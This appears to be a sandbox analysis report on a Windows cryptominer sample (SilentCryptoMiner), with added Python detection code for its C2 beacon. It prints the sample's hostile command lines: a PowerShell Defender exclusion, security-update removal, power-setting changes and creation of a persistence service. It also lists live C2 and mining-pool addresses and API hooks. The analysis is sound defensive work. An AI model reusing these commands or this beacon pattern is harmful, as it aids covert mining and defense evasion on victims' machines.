File name: file.exe
File size: 2'867'712 bytes
MD5: a03484846e3418ffa2ab8aec97a03e88
SHA1: 54c62c97db8b0234eeb7a03d66b73f9d1dc22614
SHA256: 6932616523c8080fd908d4b776f416a4d32653e657c2cbe75a42cdc0a8b5c4d1
SHA512: 0f1661dd055e34ca4c8f37bccf1aee739be12a1c6836c0af00c0c156e59e363ce0c59f4b0e1402d4367a3d9e3babc00aa5c7e512579f9295942150539103ba8f
SSDEEP: 49152:U7N5o20VC8FlpAi4y/8t6x4EBka+Okl5lo5V5i7b6LR7QY6Vtnah:c2VCkxp8t69kBOtVebk6q
TLSH: 0BD523FF7B46431CC798007F1FA869D57118FFE81B202AC781B56BDC0E616A89AB54D2
File Content Preview: MZx.....................@...................................x...hr......!..L.!This program cannot be run in DOS mode.$..PE..d.....?g.........."......z...D+.....@..........@............................. ,...........`........................................
Icon Hash: 00928e8e8686b000
Entrypoint: 0x140001140
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x140000000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp: 0x673FA31D [Thu Nov 21 21:16:13 2024 UTC]
TLS Callbacks: 0x40001760, 0x1, 0x400017e0, 0x1
CLR (.Net) Version:
OS Version Major: 6
OS Version Minor: 0
File Version Major: 6
File Version Minor: 0
Subsystem Version Major: 6
Subsystem Version Minor: 0
Import Hash: de41d4e0545d977de6ca665131bb479a
Entrypoint disassembly (Instruction):
dec eax
sub esp, 28h
dec eax
mov eax, dword ptr [00007ED5h]
mov dword ptr [eax], 00000001h
call 00007FA944D9918Fh
nop
nop
nop
dec eax
add esp, 28h
ret
nop
inc ecx
push edi
inc ecx
push esi
push esi
push edi
push ebx
dec eax
sub esp, 20h
dec eax
mov eax, dword ptr [00000030h]
dec eax
mov edi, dword ptr [eax+08h]
dec eax
mov esi, dword ptr [00007EC9h]
xor eax, eax
dec eax
cmpxchg dword ptr [esi], edi
sete bl
je 00007FA944D991B0h
dec eax
cmp edi, eax
je 00007FA944D991ABh
dec esp
mov esi, dword ptr [000096F1h]
nop word ptr [eax+eax+00000000h]
mov ecx, 000003E8h
inc ecx
call esi
xor eax, eax
dec eax
cmpxchg dword ptr [esi], edi
sete bl
je 00007FA944D99187h
dec eax
cmp edi, eax
jne 00007FA944D99169h
dec eax
mov edi, dword ptr [00007E90h]
mov eax, dword ptr [edi]
cmp eax, 01h
jne 00007FA944D9918Eh
mov ecx, 0000001Fh
call 00007FA944DA0684h
jmp 00007FA944D991A9h
cmp dword ptr [edi], 00000000h
je 00007FA944D9918Bh
mov byte ptr [002BBA71h], 00000001h
jmp 00007FA944D9919Bh
mov dword ptr [edi], 00000001h
dec eax
mov ecx, dword ptr [00007E7Ah]
dec eax
mov edx, dword ptr [00007E7Bh]
call 00007FA944DA067Bh
mov eax, dword ptr [edi]
cmp eax, 01h
jne 00007FA944D9919Bh
dec eax
mov ecx, dword ptr [00007E50h]
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xa5c0 | 0x3c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x2be000 | 0x180 | .pdata
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x2c1000 | 0x78 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x90a0 | 0x28 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x9410 | 0x138 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0xa758 | 0x158 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x7856 | 0x7a00 | f826ece2ce317d4412103755c5d3f85a | False | 0.505219006147541 | data | 6.1867285974059225 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x9000 | 0x1d08 | 0x1e00 | 1650b9e0ce371324080fb99c31494d5f | False | 0.4513020833333333 | zlib compressed data | 4.668045049109493 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xb000 | 0x2b2bc0 | 0x2b1e00 | 4fcfbe815dfea54f25a0e6ca347f2347 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata | 0x2be000 | 0x180 | 0x200 | 00ec0f04901c8f887a68a550cc9ebeed | False | 0.501953125 | data | 3.124907916476298 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.00cfg | 0x2bf000 | 0x10 | 0x200 | b18c7380298e104adf73576fa46bccc1 | False | 0.04296875 | data | 0.15127132530476972 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.tls | 0x2c0000 | 0x10 | 0x200 | bf619eac0cdf3f68d496ea9344137e8b | False | 0.02734375 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc | 0x2c1000 | 0x78 | 0x200 | 310a6f420496237ff7a209835e359952 | False | 0.232421875 | data | 1.425957514287425 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
DLL | Import
msvcrt.dll | __C_specific_handler, __getmainargs, __initenv, __iob_func, __set_app_type, __setusermatherr, _amsg_exit, _cexit, _commode, _fmode, _initterm, _onexit, _wcsicmp, _wcsnicmp, abort, calloc, exit, fprintf, free, fwrite, malloc, memcpy, memset, signal, strlen, strncmp, vfprintf, wcscat, wcscpy, wcslen, wcsncmp
KERNEL32.dll | DeleteCriticalSection, EnterCriticalSection, GetLastError, InitializeCriticalSection, LeaveCriticalSection, SetUnhandledExceptionFilter, Sleep, TlsGetValue, VirtualProtect, VirtualQuery
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-04T22:58:02.999130+0100 | 2051004 | ET MALWARE [ANY.RUN] SilentCryptoMiner Check-in POST Request | 2 | 192.168.2.5 | 57089 | 83.217.209.235 | 80 | TCP
2025-01-04T22:58:02.999130+0100 | 2826930 | ETPRO COINMINER XMR CoinMiner Usage | 2 | 192.168.2.5 | 49704 | 141.94.96.144 | 8080 | TCP
2025-01-04T22:58:13.875308+0100 | 2047928 | ET MALWARE CoinMiner Domain in DNS Lookup (pool .supportxmr .com) | 2 | 192.168.2.5 | 59674 | 1.1.1.1 | 53 | UDP
2025-01-04T22:58:19.921055+0100 | 2051004 | ET MALWARE [ANY.RUN] SilentCryptoMiner Check-in POST Request | 2 | 192.168.2.5 | 49705 | 83.217.209.235 | 80 | TCP
2025-01-04T22:59:18.545663+0100 | 2051004 | ET MALWARE [ANY.RUN] SilentCryptoMiner Check-in POST Request | 2 | 192.168.2.5 | 57087 | 83.217.209.235 | 80 | TCP
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 4, 2025 22:58:13.875308037 CET | 192.168.2.5 | 1.1.1.1 | 0xf322 | Standard query (0) | pool.supportxmr.com | A (IP address) | IN (0x0001) | false
Jan 4, 2025 22:58:39.879900932 CET | 192.168.2.5 | 1.1.1.1 | 0xbf5d | Standard query (0) | 198.187.3.20.in-addr.arpa | PTR (Pointer record) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 4, 2025 22:58:13.882014036 CET | 1.1.1.1 | 192.168.2.5 | 0xf322 | No error (0) | pool.supportxmr.com | pool-fr.supportxmr.com | | CNAME (Canonical name) | IN (0x0001) | false
Jan 4, 2025 22:58:13.882014036 CET | 1.1.1.1 | 192.168.2.5 | 0xf322 | No error (0) | pool-fr.supportxmr.com | | 141.94.96.144 | A (IP address) | IN (0x0001) | false
Jan 4, 2025 22:58:13.882014036 CET | 1.1.1.1 | 192.168.2.5 | 0xf322 | No error (0) | pool-fr.supportxmr.com | | 141.94.96.71 | A (IP address) | IN (0x0001) | false
Jan 4, 2025 22:58:13.882014036 CET | 1.1.1.1 | 192.168.2.5 | 0xf322 | No error (0) | pool-fr.supportxmr.com | | 141.94.96.195 | A (IP address) | IN (0x0001) | false
Jan 4, 2025 22:58:39.888663054 CET | 1.1.1.1 | 192.168.2.5 | 0xbf5d | Name error (3) | 198.187.3.20.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001) | false
• 83.217.209.235
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49705 | 83.217.209.235 | 80 | 528 | C:\Windows\System32\dialer.exe
Timestamp | Bytes transferred | Direction | Data
Jan 4, 2025 22:58:14.929846048 CET | 233 | OUT | POST /yzyzyzyznznnznzxncxzhzxchzcxhcxzhzxchzcxzxcjjkasdjksajkdsa/api/endpoint.php HTTP/1.1
Accept: */*
Connection: close
Content-Length: 485
Content-Type: application/json
Host: 83.217.209.235
User-Agent: cpp-httplib/0.12.6
Jan 4, 2025 22:58:14.935831070 CET | 485 | OUT | Data Raw: 7b 22 69 64 22 3a 22 6c 64 6e 64 68 6f 61 69 66 6c 6b 68 70 61 64 6c 22 2c 22 63 6f 6d 70 75 74 65 72 6e 61 6d 65 22 3a 22 30 33 35 33 34 37 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 59 53 54 45 4d 22 2c 22 67 70 75 22 3a 22 35 31 5a 42 32 4d
Data Ascii: {"id":"ldndhoaiflkhpadl","computername":"035347","username":"SYSTEM","gpu":"51ZB2MRM","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"","version":"3.4.0","activewindow":"Running as System"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 57087 | 83.217.209.235 | 80 | 528 | C:\Windows\System32\dialer.exe
Timestamp | Bytes transferred | Direction | Data
Jan 4, 2025 22:59:13.530303955 CET | 233 | OUT | POST /yzyzyzyznznnznzxncxzhzxchzcxhcxzhzxchzcxzxcjjkasdjksajkdsa/api/endpoint.php HTTP/1.1
Accept: */*
Connection: close
Content-Length: 501
Content-Type: application/json
Host: 83.217.209.235
User-Agent: cpp-httplib/0.12.6
Jan 4, 2025 22:59:13.535135984 CET | 501 | OUT | Data Raw: 7b 22 69 64 22 3a 22 6c 64 6e 64 68 6f 61 69 66 6c 6b 68 70 61 64 6c 22 2c 22 63 6f 6d 70 75 74 65 72 6e 61 6d 65 22 3a 22 30 33 35 33 34 37 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 59 53 54 45 4d 22 2c 22 67 70 75 22 3a 22 35 31 5a 42 32 4d
Data Ascii: {"id":"ldndhoaiflkhpadl","computername":"035347","username":"SYSTEM","gpu":"51ZB2MRM","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"","version":"3.4.0","activewindow":"Running as System"


Session ID | Source IP | Source Port | Destination IP | Destination Port
2 | 192.168.2.5 | 57089 | 83.217.209.235 | 80
Timestamp | Bytes transferred | Direction | Data
Jan 4, 2025 23:00:20.609375000 CET | 233 | OUT | POST /yzyzyzyznznnznzxncxzhzxchzcxhcxzhzxchzcxzxcjjkasdjksajkdsa/api/endpoint.php HTTP/1.1
Accept: */*
Connection: close
Content-Length: 487
Content-Type: application/json
Host: 83.217.209.235
User-Agent: cpp-httplib/0.12.6
Jan 4, 2025 23:00:20.614234924 CET | 487 | OUT | Data Raw: 7b 22 69 64 22 3a 22 6c 64 6e 64 68 6f 61 69 66 6c 6b 68 70 61 64 6c 22 2c 22 63 6f 6d 70 75 74 65 72 6e 61 6d 65 22 3a 22 30 33 35 33 34 37 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 59 53 54 45 4d 22 2c 22 67 70 75 22 3a 22 35 31 5a 42 32 4d
Data Ascii: {"id":"ldndhoaiflkhpadl","computername":"035347","username":"SYSTEM","gpu":"51ZB2MRM","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"","version":"3.4.0","activewindow":"Running as System"
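The three sessions above are one beacon repeated about once a minute: a POST to /api/endpoint.php on a bare IP, the default User-Agent of the cpp-httplib library (no product name), and a JSON host fingerprint (id, computername, username, gpu, cpu, version, activewindow), sent from dialer.exe (PID 528 in session 1), a Windows phone-dialer binary that has no business speaking HTTP. The Python below is an added example, not part of the Joe Sandbox report or of the sample: it parses raw HTTP requests and scores them on exactly those traits, requiring two independent ones before flagging. Both sample requests are constructed for the example; the first copies the request line, headers and JSON field names from the report (the body is closed with a brace because the report truncates it, and Content-Length is omitted), the second is a benign control.

```python
import json
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

# Constructed sample traffic (not a capture). The first request copies the request
# line, headers and JSON field names from the report; the body is closed with '}'
# because the report truncates it. The second request is a benign control.
SAMPLE_REQUESTS = [
    "POST /yzyzyzyznznnznzxncxzhzxchzcxhcxzhzxchzcxzxcjjkasdjksajkdsa/api/endpoint.php HTTP/1.1\r\n"
    "Accept: */*\r\n"
    "Connection: close\r\n"
    "Content-Type: application/json\r\n"
    "Host: 83.217.209.235\r\n"
    "User-Agent: cpp-httplib/0.12.6\r\n"
    "\r\n"
    '{"id":"ldndhoaiflkhpadl","computername":"035347","username":"SYSTEM",'
    '"gpu":"51ZB2MRM","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz",'
    '"remoteconfig":"","version":"3.4.0","activewindow":"Running as System"}',

    "POST /api/v1/telemetry HTTP/1.1\r\n"
    "Host: updates.example.com\r\n"
    "Content-Type: application/json\r\n"
    "User-Agent: Mozilla/5.0\r\n"
    "\r\n"
    '{"event":"heartbeat","ts":1736031493}',
]

# Field set the beacon reports about the victim host.
FINGERPRINT_KEYS = {"id", "computername", "username", "gpu", "cpu", "version", "activewindow"}


@dataclass
class Verdict:
    suspicious: bool
    reasons: List[str] = field(default_factory=list)
    bot_id: Optional[str] = None
    host: Optional[str] = None


def parse_request(raw: str) -> Tuple[str, str, Dict[str, str], str]:
    """Split a raw HTTP/1.1 request into method, path, lower-cased headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers: Dict[str, str] = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def classify(raw: str) -> Verdict:
    """Score one request on the traits the report's beacon shows."""
    method, path, headers, body = parse_request(raw)
    reasons: List[str] = []
    bot_id = None

    ua = headers.get("user-agent", "")
    if ua.startswith("cpp-httplib/"):              # library default UA, no product name
        reasons.append(f"default library User-Agent: {ua}")
    if method == "POST" and path.endswith("/api/endpoint.php"):
        reasons.append("POST to /api/endpoint.php")
    if re.fullmatch(r"\d{1,3}(\.\d{1,3}){3}", headers.get("host", "")):
        reasons.append("Host header is a bare IPv4 address")
    if headers.get("content-type", "").startswith("application/json"):
        try:
            doc = json.loads(body)
        except json.JSONDecodeError:
            doc = None
        if isinstance(doc, dict):
            present = FINGERPRINT_KEYS & set(doc)
            if len(present) >= 5:                  # tolerate small field changes between versions
                reasons.append(f"host-fingerprint JSON keys: {sorted(present)}")
                bot_id = doc.get("id")

    # Two independent traits are required so a lone JSON POST to an IP is not flagged.
    return Verdict(len(reasons) >= 2, reasons, bot_id, headers.get("host"))


def scan(requests: List[str]) -> List[Verdict]:
    return [classify(r) for r in requests]


if __name__ == "__main__":
    for v in scan(SAMPLE_REQUESTS):
        print(v)
```

The bot id and Host from a positive verdict are what you would pivot on next: the id is stable across the three beacons above, so it identifies the infected host in later traffic even if the path or IP changes.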


                                                                              Code Manipulations

Function Name | Hook Type | Active in Processes | New Data
ZwEnumerateKey | INLINE | winlogon.exe, explorer.exe | 0xE9 0x9C 0xC3 0x32 0x2C 0xCF
NtQuerySystemInformation | INLINE | winlogon.exe, explorer.exe | 0xE9 0x9C 0xC3 0x32 0x2A 0xAF
ZwResumeThread | INLINE | winlogon.exe, explorer.exe | 0xE9 0x9A 0xA3 0x32 0x27 0x7F
NtDeviceIoControlFile | INLINE | winlogon.exe, explorer.exe | 0xE9 0x90 0x03 0x33 0x34 0x4F
ZwDeviceIoControlFile | INLINE | winlogon.exe, explorer.exe | 0xE9 0x90 0x03 0x33 0x34 0x4F
NtEnumerateKey | INLINE | winlogon.exe, explorer.exe | 0xE9 0x9C 0xC3 0x32 0x2C 0xCF
NtQueryDirectoryFile | INLINE | winlogon.exe, explorer.exe | 0xE9 0x9A 0xA3 0x32 0x2B 0xBF
ZwEnumerateValueKey | INLINE | winlogon.exe, explorer.exe | 0xE9 0x90 0x03 0x33 0x31 0x1F
ZwQuerySystemInformation | INLINE | winlogon.exe, explorer.exe | 0xE9 0x9C 0xC3 0x32 0x2A 0xAF
NtResumeThread | INLINE | winlogon.exe, explorer.exe | 0xE9 0x9A 0xA3 0x32 0x27 0x7F
RtlGetNativeSystemInformation | INLINE | winlogon.exe, explorer.exe | 0xE9 0x9C 0xC3 0x32 0x2A 0xAF
NtQueryDirectoryFileEx | INLINE | winlogon.exe, explorer.exe | 0xE9 0x97 0x73 0x30 0x0A 0xAF
NtEnumerateValueKey | INLINE | winlogon.exe, explorer.exe | 0xE9 0x90 0x03 0x33 0x31 0x1F
ZwQueryDirectoryFileEx | INLINE | winlogon.exe, explorer.exe | 0xE9 0x97 0x73 0x30 0x0A 0xAF
ZwQueryDirectoryFile | INLINE | winlogon.exe, explorer.exe | 0xE9 0x9A 0xA3 0x32 0x2B 0xBF


                                                                              Target ID:0
                                                                              Start time:16:58:04
                                                                              Start date:04/01/2025
                                                                              Path:C:\Users\user\Desktop\file.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Users\user\Desktop\file.exe"
                                                                              Imagebase:0x7ff749f40000
                                                                              File size:2'867'712 bytes
                                                                              MD5 hash:A03484846E3418FFA2AB8AEC97A03E88
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              Target ID:1
                                                                              Start time:16:58:05
                                                                              Start date:04/01/2025
                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                              Imagebase:0x7ff7be880000
                                                                              File size:452'608 bytes
                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:2
                                                                              Start time:16:58:05
                                                                              Start date:04/01/2025
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6d64d0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:5
                                                                              Start time:16:58:08
                                                                              Start date:04/01/2025
                                                                              Path:C:\Windows\System32\cmd.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                              Imagebase:0x7ff7caad0000
                                                                              File size:289'792 bytes
                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:6
                                                                              Start time:16:58:08
                                                                              Start date:04/01/2025
                                                                              Path:C:\Windows\System32\powercfg.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                              Imagebase:0x7ff791450000
                                                                              File size:96'256 bytes
                                                                              MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:moderate
                                                                              Has exited:true

                                                                              Target ID:7
                                                                              Start time:16:58:08
                                                                              Start date:04/01/2025
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6d64d0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:8
                                                                              Start time:16:58:08
                                                                              Start date:04/01/2025
                                                                              Path:C:\Windows\System32\powercfg.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                              Imagebase:0x7ff791450000
                                                                              File size:96'256 bytes
                                                                              MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:moderate
                                                                              Has exited:true

                                                                              Target ID:9
                                                                              Start time:16:58:08
                                                                              Start date:04/01/2025
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6d64d0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:10
                                                                              Start time:16:58:08
                                                                              Start date:04/01/2025
                                                                              Path:C:\Windows\System32\powercfg.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                              Imagebase:0x7ff791450000
                                                                              File size:96'256 bytes
                                                                              MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:moderate
                                                                              Has exited:true

                                                                              Target ID:11
                                                                              Start time:16:58:08
                                                                              Start date:04/01/2025
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6d64d0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:12
                                                                              Start time:16:58:08
                                                                              Start date:04/01/2025
                                                                              Path:C:\Windows\System32\powercfg.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                              Imagebase:0x7ff791450000
                                                                              File size:96'256 bytes
                                                                              MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:13
                                                                              Start time:16:58:08
                                                                              Start date:04/01/2025
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6d64d0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:14
                                                                              Start time:16:58:08
                                                                              Start date:04/01/2025
                                                                              Path:C:\Windows\System32\dialer.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\dialer.exe
                                                                              Imagebase:0x7ff600680000
                                                                              File size:39'936 bytes
                                                                              MD5 hash:B2626BDCF079C6516FC016AC5646DF93
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:15
                                                                              Start time:16:58:08
                                                                              Start date:04/01/2025
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6d64d0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:16
                                                                              Start time:16:58:08
                                                                              Start date:04/01/2025
                                                                              Path:C:\Windows\System32\sc.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\sc.exe delete "LightService"
                                                                              Imagebase:0x7ff6b45e0000
                                                                              File size:72'192 bytes
                                                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:17
                                                                              Start time:16:58:09
                                                                              Start date:04/01/2025
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6d64d0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:18
                                                                              Start time:16:58:09
                                                                              Start date:04/01/2025
                                                                              Path:C:\Windows\System32\wusa.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                                                              Imagebase:0x7ff71a810000
                                                                              File size:345'088 bytes
                                                                              MD5 hash:FBDA2B8987895780375FE0E6254F6198
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:19
                                                                              Start time:16:58:09
                                                                              Start date:04/01/2025
                                                                              Path:C:\Windows\System32\sc.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\sc.exe create "LightService" binpath= "C:\ProgramData\IGaming\driver.exe" start= "auto"
                                                                              Imagebase:0x7ff6b45e0000
                                                                              File size:72'192 bytes
                                                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:20
                                                                              Start time:16:58:09
                                                                              Start date:04/01/2025
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6d64d0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:21
                                                                              Start time:16:58:09
                                                                              Start date:04/01/2025
                                                                              Path:C:\Windows\System32\winlogon.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:winlogon.exe
                                                                              Imagebase:0x7ff6156c0000
                                                                              File size:906'240 bytes
                                                                              MD5 hash:F8B41A1B3E569E7E6F990567F21DCE97
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              Target ID:22
                                                                              Start time:16:58:09
                                                                              Start date:04/01/2025
